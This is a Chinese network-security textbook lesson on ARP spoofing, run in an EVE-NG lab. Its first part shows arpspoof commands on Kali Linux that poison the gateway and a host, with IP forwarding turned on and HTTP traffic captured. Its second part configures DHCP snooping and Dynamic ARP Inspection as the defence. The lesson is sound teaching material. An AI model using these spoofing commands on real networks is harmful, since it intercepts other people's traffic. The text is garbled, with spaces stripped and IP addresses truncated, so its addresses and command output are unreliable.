《计算机网络安全防护技术（第二版）》 课件 第5章 任务5.4 ARP欺骗攻击及防御

第5章局域网安全技术编著：

秦燊劳翠金

任务5.4ARP欺骗攻击及防御任务5.4ARP欺骗攻击及防御

攻击者通过ARP欺骗，让用户认为攻击者的电脑就是网关，同时让网关认为攻击者的电脑就是用户的电脑。使用户访问外网需要攻击的电脑中转。攻击者以中间人的角色进行抓包截获受害者通过网络传输的信息。

启动EVE-NG，搭建如图5-4-1的拓扑图。图5-4-1实验拓扑图5-4-1实验拓扑5.4.1ARP欺骗攻击一、客户机通过DHCP服务器获取到了IP地址、子网掩码、缺省网关等信息。查看客户机获取到的IP地址：C:\DocumentsandSettings\Administrator>ipconfig/allEthernetadapter本地连接:Connection-specificDNSSuffix.:Description...........:Intel(R)PRO/1000MTNetworkConnectionPhysicalAddress.........:30-30-30-30-30-30DHCPEnabled...........:YesAutoconfigurationEnabled....:YesIPAddress............:0SubnetMask...........:DefaultGateway.........:54DHCPServer...........:0DNSServers...........:14LeaseObtained..........:2018年12月25日7:06:31LeaseExpires..........:2019年1月2日7:06:31二、查看路由器的相关接口配置的IP地址及路由表1.查看路由器的配置R1#showipintbInterfaceIP-AddressOK?MethodStatusProtocolGigabitEthernet0/054YESmanualupupGigabitEthernet0/10YESmanualupupGigabitEthernet0/2unassignedYESunsetadministrativelydowndownGigabitEthernet0/3unassignedYESunsetadministrativelydowndown2.查看路由表R1#showiprouteCodes:L-local,C-connected,S-static,R-RIP,M-mobile,B-BGPD-EIGRP,EX-EIGRPexternal,O-OSPF,IA-OSPFinterareaN1-OSPFNSSAexternaltype1,N2-OSPFNSSAexternaltype2E1-OSPFexternaltype1,E2-OSPFexternaltype2i-IS-IS,su-IS-ISsummary,L1-IS-ISlevel-1,L2-IS-ISlevel-2ia-IS-ISinterarea,*-candidatedefault,U-per-userstaticrouteo-ODR,P-periodicdownloadedstaticroute,H-NHRP,l-LISPa-applicationroute+-replicatedroute,%-nexthopoverride,p-overridesfromPfRGatewayoflastresortistonetworkS*/0[1/0]via/24isvariablysubnetted,2subnets,2masksC/24isdirectlyconnected,GigabitEthernet0/0L54/32isdirectlyconnected,GigabitEthernet0/0/24isvariablysubnetted,2subnets,2masksC/24isdirectlyconnected,GigabitEthernet0/1L0/32isdirectlyconnected,GigabitEthernet0/1三、在路由器上，ping各主机，查看ARP缓存表1.PingDHCP服务器0R1#ping02.PingkaliLinux主机1R1#ping13.Ping客户机R1#ping04.经过ping测试，R1获取到了各相关主机的MAC地址，通过查看R1上的ARP缓存表，确认各主机IP地址与MAC地址的对应关系。R1#showarpProtocolAddressAge(min)HardwareAddrTypeInterfaceInternet011010.1010.1010ARPAGigabitEthernet0/0Internet106060.6060.6060ARPAGigabitEthernet0/0Internet013030.3030.3030ARPAGigabitEthernet0/0Internet54-8080.8080.8080ARPAGigabitEthernet0/0Internet10050.56e1.7e5fARPAGigabitEthernet0/1Internet0-5000.0002.0001ARPAGigabitEthernet0/1四、在客户机上：1.在客户机上，pingDHCP服务器、网关、KaliLinux客户机、百度网站。C:\>ipconfigC:\>ping0C:\>ping54C:\>ping1C:\>ping都能ping通。2.查看ARP缓存表C:\>arp-aInterface:0---0x60003InternetAddressPhysicalAddressType010-10-10-10-10-10dynamic160-60-60-60-60-60dynamic5480-80-80-80-80-80dynamic五、在DHCP服务器上：C:\>ipconfigC:\>ping1C:\>ping0C:\>ping54C:\>arp-aInterface:0---0x60003InternetAddressPhysicalAddressType010-10-10-10-10-10dynamic160-60-60-60-60-60dynamic5480-80-80-80-80-80dynamic六、在交换机上：1.查看mac地址表SW1#showmacaddress-tableMacAddressTable-------------------------------------------VlanMacAddressTypePorts----------------------------10050.56c0.0001DYNAMICGi0/010050.56c0.0002DYNAMICGi0/110050.56c0.0003DYNAMICGi0/210050.56c0.0004DYNAMICGi1/011010.1010.1010DYNAMICGi0/013030.3030.3030DYNAMICGi0/216060.6060.6060DYNAMICGi1/018080.8080.8080DYNAMICGi0/3TotalMacAddressesforthiscriterion:82.查看当前的DHCP监听绑定表SW1#showipdhcpsnoopingbindingMacAddressIpAddressLease(sec)TypeVLANInterface--------------------------------------------------------------------Totalnumberofbindings:03.查看DHCP监听绑定数据库的相关信息SW1#showipdhcpsnoopingdatabaseAgentURL:WritedelayTimer:300secondsAbortTimer:300secondsAgentRunning:NoDelayTimerExpiry:NotRunningAbortTimerExpiry:NotRunningLastSuccededTime:NoneLastFailedTime:NoneLastFailedReason:Nofailurerecorded.TotalAttempts:0StartupFailures:0SuccessfulTransfers:0FailedTransfers:0SuccessfulReads:0FailedReads:0SuccessfulWrites:0FailedWrites:0MediaFailures:0七、在KaliLinux上：开启三个命令行窗口：第一个窗口：root@kali:~#arpspoof-t0-r54用于攻击0，将KaliLinux仿造成54。第二个窗口：root@kali:~#arpspoof-t54-r0用于攻击54，将KaliLinux仿造成0。第三个窗口：root@kali:~#ping0root@kali:~#ping54八、在DHCP服务器上，查arp缓存表，可以发现，网关的MAC地址已经变成kali的了：攻击前查看到的：C:\DocumentsandSettings\Administrator>arp-aInterface:0---0x10003InternetAddressPhysicalAddressType160-60-60-60-60-60dynamic5480-80-80-80-80-80dynamic攻击后查看到的：C:\DocumentsandSettings\Administrator>arp-aInterface:0---0x10003InternetAddressPhysicalAddressType160-60-60-60-60-60dynamic5460-60-60-60-60-60dynamic九、在路由器上，查arp缓存表，可以发现，DHCP服务器的MAC地址已经变成kali的了：攻击前查看到的：R1#showarpProtocolAddressAge(min)HardwareAddrTypeInterfaceInternet001010.1010.1010ARPAGigabitEthernet0/0Internet106060.6060.6060ARPAGigabitEthernet0/0攻击后查看到的：R1#showarpProtocolAddressAge(min)HardwareAddrTypeInterfaceInternet006060.6060.6060ARPAGigabitEthernet0/0Internet106060.6060.6060ARPAGigabitEthernet0/0十、在kalilinux1.暂时打开路由功能echo1>/proc/sys/net/ipv4/ip_forward2.查看路由表root@kali:~#route-nKernelIProutingtableDestinationGatewayGenmaskFlagsMetricRefUseIface54UG000eth0U000eth0可以查看到，之前已经将默认路由指向了54。3.在kaliLinux上，打开抓包软件，开始抓包，过滤设成http，只显示抓到的http流量。在DHCP服务器win1上，访问。如图5-4-2所示，在KaliLinux上，抓包软件显示：可以抓到win1访问baidu的包。图5-4-2KaliLinux上的抓包结果5.4.2ARP攻击的防御

针对ARP攻击，可在交换机上启用动态ARP检查（DynamicARPInspection，DAI）来进行防御。DAI是基于DHCPSnooping来工作的，DHCPSnooping监听并绑定IP地址与MAC地址到绑定表中，并与相应的交换机端口关联。DAI以这个表来检查非信任端口的ARP请求和应答，拒绝不合法的APR包；对于可信任接口，不需要做任何检查。对于不使用DHCP获取IP地址的计算机，需静态添加DHCP绑定表或通过ARPaccess-list来设置IP地址、MAC地址及交换机端口的对应关系。一、停止攻击在kaliLinux上，按^Z，停止攻击，归还正常MAC地址。二、在交换机上1.激活DHCPSnooping技术Switch>enSwitch#conftSwitch(config)#ipdhcpsnoopingSwitch(config)#clocktimezoneGMT+8Switch(config)#exitSwitch#clockset09:24:0024Aug2018Switch#conftSwitch(config)#ipdhcpsnoopingdatabaseflash:/dai.dbSwitch(config)#intg0/0Switch(config-if)#ipdhcpsnoopingtrustSwitch(config)#ipdhcpsnoopingvlan1Switch#showipdhcpsnoopingbinding2.若存在多台交换机，需要对交换机与交换机之间的接口启用信任。本例中不需要配置。3．对不信任接口发ARP包进行限速。Switch(config)#intrangeg0/0-3,g1/0Switch(config-if-range)#iparpinspectionlimitrate104.建立ARP访问控制列表，指定正常IP与MAC的映射关系，并应用到vlan1。Switch(config)#arpaccess-listarplist1Switch(config-arp-nacl)#permitiphost0machost1010.1010.1010Switch(config-arp-nacl)#permitiphost1machost6060.6060.6060Switch(config-arp-nacl)#permitiphost0machost2020.2020.2020Switch(config-arp-nacl)#permitiphost54machost8080.8080.8080Switch(config-arp-nacl)#exitSwitch(config)#iparpinspectionfilterarplist1vlan1static其中，iparpinspectionfilterarplist1vlan1static表示只认可静态输入的映射关系，不认可DHCPSno